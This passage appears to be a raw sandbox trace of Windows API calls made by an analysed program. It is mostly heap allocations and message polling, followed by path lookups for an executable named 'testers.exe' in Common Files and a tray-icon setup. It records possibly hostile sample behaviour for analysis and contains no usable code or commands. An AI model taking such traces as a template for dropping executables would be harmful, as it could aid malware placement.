HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969478 | out: hHeap=0x850000) returned 1 [0276.925] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965db0 | out: hHeap=0x850000) returned 1 [0276.925] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959f40 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969478 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965db0 [0276.925] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969478 | out: hHeap=0x850000) returned 1 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959f68 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969478 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969448 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965dc0 [0276.925] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969448 | out: hHeap=0x850000) returned 1 [0276.925] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965dc0 | out: hHeap=0x850000) returned 1 [0276.925] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959f90 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969448 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965dc0 [0276.925] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969448 | out: hHeap=0x850000) returned 1 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959fb8 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969448 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694a8 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965dd0 [0276.925] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9694a8 | out: hHeap=0x850000) returned 1 [0276.925] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965dd0 | out: hHeap=0x850000) returned 1 [0276.925] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959fe0 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694a8 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965dd0 [0276.925] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9694a8 | out: hHeap=0x850000) returned 1 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a008 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694a8 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694c0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965de0 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9694c0 | out: hHeap=0x850000) returned 1 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965de0 | out: hHeap=0x850000) returned 1 [0276.926] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a030 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694c0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965de0 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9694c0 | out: hHeap=0x850000) returned 1 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96eeb8 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694c0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694d8 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965df0 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9694d8 | out: hHeap=0x850000) returned 1 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965df0 | out: hHeap=0x850000) returned 1 [0276.926] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a058 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694d8 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965df0 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9694d8 | out: hHeap=0x850000) returned 1 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96eef0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694d8 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694f0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e00 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9694f0 | out: hHeap=0x850000) returned 1 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e00 | out: hHeap=0x850000) returned 1 [0276.926] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a080 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694f0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e00 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9694f0 | out: hHeap=0x850000) returned 1 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ef28 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9694f0 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969508 [0276.926] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e10 [0276.926] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969508 | out: hHeap=0x850000) returned 1 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e10 | out: hHeap=0x850000) returned 1 [0276.927] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a0a8 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969508 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e10 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969508 | out: hHeap=0x850000) returned 1 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ef60 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969508 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969520 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e20 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969520 | out: hHeap=0x850000) returned 1 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e20 | out: hHeap=0x850000) returned 1 [0276.927] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a0d0 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969520 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e20 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969520 | out: hHeap=0x850000) returned 1 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x8f3920 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969520 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969538 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e30 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969538 | out: hHeap=0x850000) returned 1 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e30 | out: hHeap=0x850000) returned 1 [0276.927] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a0f8 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969538 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e30 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969538 | out: hHeap=0x850000) returned 1 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ef98 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969538 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969550 [0276.927] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e40 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969550 | out: hHeap=0x850000) returned 1 [0276.927] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e40 | out: hHeap=0x850000) returned 1 [0276.927] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a120 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969550 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e40 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969550 | out: hHeap=0x850000) returned 1 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96efd0 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969550 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969568 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e50 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969568 | out: hHeap=0x850000) returned 1 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e50 | out: hHeap=0x850000) returned 1 [0276.928] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a148 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969568 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e50 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969568 | out: hHeap=0x850000) returned 1 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96f008 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969568 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969580 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e60 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969580 | out: hHeap=0x850000) returned 1 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e60 | out: hHeap=0x850000) returned 1 [0276.928] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a170 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969580 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e60 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969580 | out: hHeap=0x850000) returned 1 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x88ae98 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969580 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969598 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e70 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969598 | out: hHeap=0x850000) returned 1 [0276.928] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e70 | out: hHeap=0x850000) returned 1 [0276.928] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a198 [0276.928] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969598 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e70 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969598 | out: hHeap=0x850000) returned 1 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x88aee0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969598 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695b0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e80 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9695b0 | out: hHeap=0x850000) returned 1 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e80 | out: hHeap=0x850000) returned 1 [0276.929] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a1c0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695b0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e80 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9695b0 | out: hHeap=0x850000) returned 1 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x88af28 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695b0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695c8 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965e90 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9695c8 | out: hHeap=0x850000) returned 1 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965e90 | out: hHeap=0x850000) returned 1 [0276.929] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a1e8 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695c8 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965e90 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9695c8 | out: hHeap=0x850000) returned 1 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x88af70 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695c8 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695e0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965ea0 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9695e0 | out: hHeap=0x850000) returned 1 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965ea0 | out: hHeap=0x850000) returned 1 [0276.929] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a210 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695e0 [0276.929] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965ea0 [0276.929] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9695e0 | out: hHeap=0x850000) returned 1 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96f040 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695e0 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695f8 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965eb0 [0276.930] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9695f8 | out: hHeap=0x850000) returned 1 [0276.930] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965eb0 | out: hHeap=0x850000) returned 1 [0276.930] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a238 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695f8 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965eb0 [0276.930] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9695f8 | out: hHeap=0x850000) returned 1 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x50) returned 0x8d3728 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9695f8 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969610 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965ec0 [0276.930] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969610 | out: hHeap=0x850000) returned 1 [0276.930] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965ec0 | out: hHeap=0x850000) returned 1 [0276.930] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a260 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969610 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965ec0 [0276.930] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969610 | out: hHeap=0x850000) returned 1 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x88afb8 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969610 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969628 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965ed0 [0276.930] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969628 | out: hHeap=0x850000) returned 1 [0276.930] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965ed0 | out: hHeap=0x850000) returned 1 [0276.930] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x95a288 [0276.930] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969628 [0276.933] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x74f7cc, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0276.934] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x74f7cc, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0276.934] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x74f7cc, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0276.935] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x74f7cc, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0276.935] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x74f7cc, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x0 [0276.935] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe", lpszShortPath=0x74f7cc, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 0x20 [0277.647] Shell_NotifyIconW (dwMessage=0x1, lpData=0x75edc0) returned 1 [0277.647] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x892ba8 | out: hHeap=0x850000) returned 1 [0277.647] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.647] KillTimer (hWnd=0xa0160, uIDEvent=0x1) returned 1 [0277.647] SetTimer (hWnd=0xa0160, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0277.648] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.648] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.648] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.648] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.648] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.648] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.648] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.648] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.648] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.648] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.648] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.648] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891978 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891b98 [0277.648] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891b98 | out: hHeap=0x850000) returned 1 [0277.648] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969d30 [0277.648] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891978 | out: hHeap=0x850000) returned 1 [0277.649] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969d30 | out: hHeap=0x850000) returned 1 [0277.649] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 0 [0277.649] PeekMessageW (in: lpMsg=0x75f724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f724) returned 